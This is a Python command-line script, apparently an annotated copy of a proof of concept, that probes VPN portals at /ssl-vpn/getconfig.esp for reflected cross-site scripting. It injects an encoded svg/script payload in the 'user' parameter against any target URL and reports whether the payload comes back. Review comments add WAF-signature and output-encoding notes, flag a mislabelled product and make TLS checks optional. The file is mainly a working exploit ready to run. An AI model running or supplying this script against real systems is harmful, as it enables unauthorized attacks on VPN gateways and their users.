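import requests
import argparse
import warnings

# NOTE(review): this filter does not actually silence urllib3's
# InsecureRequestWarning -- that class derives from urllib3.exceptions.HTTPWarning,
# not from UserWarning -- so the warning still prints when verification is off.
# Left in place: the warning is a useful reminder that TLS checks are disabled below.
warnings.filterwarnings("ignore", category=UserWarning, module='urllib3')

# Query string appended to the target base URL.  The reflected-input probe is the
# `user` parameter: a percent-encoded <svg> element wrapping a <script> that calls
# prompt("mitsec"), which send_request() later looks for in the response body.
# Every other parameter is a fixed value carried over from the original script
# (the `authcookie` token is static and is not a live session).
# Defensive notes: a GET to this path whose `user` value contains percent-encoded
# markup ("%3Csvg", "%3Cscript") is a straightforward WAF/IDS signature, and the
# server-side fix is context-aware output encoding of `user` wherever it is echoed.
PAYLOAD_PATH = (
    "/ssl-vpn/getconfig.esp"
    "?client-type=1"
    "&protocol-version=p1"
    "&app-version=3.0.1-10"
    "&clientos=Linux"
    "&os-version=linux-64"
    "&hmac-algo=sha1%2Cmd5"
    "&enc-algo=aes-128-cbc%2Caes-256-cbc"
    "&authcookie=12cea70227d3aafbf25082fac1b6f51d"
    "&portal=us-vpn-gw-N"
    "&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22mitsec%22%29%3C%2Fscript%3E%3C%2Fsvg%3E"
    "&domain=(empty_domain)"
    "&computer=computer"
)


def build_exploit_url(base_url):
    """Return ``base_url`` joined with :data:`PAYLOAD_PATH`.

    Args:
        base_url: Scheme and host of the target, e.g. ``https://target.com``.

    Returns:
        ``base_url`` with every trailing slash removed, followed by the path.
        The original stripped only a single slash, so ``https://host//`` produced
        a doubled separator; ``rstrip`` covers that case as well.
    """
    return base_url.rstrip("/") + PAYLOAD_PATH


def send_request(url, *, verify=False):
    """Send one GET to ``url`` and report whether the marker script is echoed back.

    Args:
        url: Full request URL, normally from :func:`build_exploit_url`.
        verify: Forwarded to ``requests.get``.  Defaults to ``False`` to keep the
            original behaviour, but with verification disabled the tester's own
            request and response can be intercepted or altered in transit, so
            pass ``True`` whenever the target presents a trusted certificate.

    Prints the status code, a one-line verdict and the first 500 characters of
    the body.  ``requests`` transport errors are caught and printed; nothing is
    returned.
    """
    print(f"[+] Sending request to:\n{url}\n")
    try:
        # SECURITY: verify may be False, in which case the server certificate
        # is not checked at all.
        response = requests.get(url, verify=verify, timeout=10)
        status = response.status_code
        print(f"[+] Status Code: {status}")
        if status in (401, 403, 500):
            print("[!] Access denied or server error (possible WAF/protection).")
        elif (
            "prompt(\"mitsec\")" in response.text
            or "prompt('mitsec')" in response.text
        ):
            # Substring match only: this shows the marker came back verbatim,
            # not that a browser would execute it (encoding context, CSP or an
            # X-Content-Type-Options header may still prevent that).
            print("[✅] XSS payload reflected! Look for prompt box on browser rendering.")
        else:
            print("[~] Payload not directly reflected. Review HTML manually.")
        print("\n--- Response Preview ---")
        print(response.text[:500])
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")


if __name__ == "__main__":
    # NOTE(review): the description says "Fortinet-style", but the request path
    # /ssl-vpn/getconfig.esp resembles a GlobalProtect gateway endpoint rather than
    # a Fortinet one -- confirm the intended product before relying on the label.
    parser = argparse.ArgumentParser(description="🔥 XSS Exploit for Fortinet-style VPN portals (mitsec edition)")
    parser.add_argument("-u", "--url", required=True, help="Base URL of the target (e.g., https://target.com)")
    # Optional; default False preserves the original (unverified TLS) behaviour.
    parser.add_argument(
        "--verify",
        action="store_true",
        help="Verify the target's TLS certificate (off by default, as in the original script).",
    )
    args = parser.parse_args()
    full_url = build_exploit_url(args.url)
    send_request(full_url, verify=args.verify)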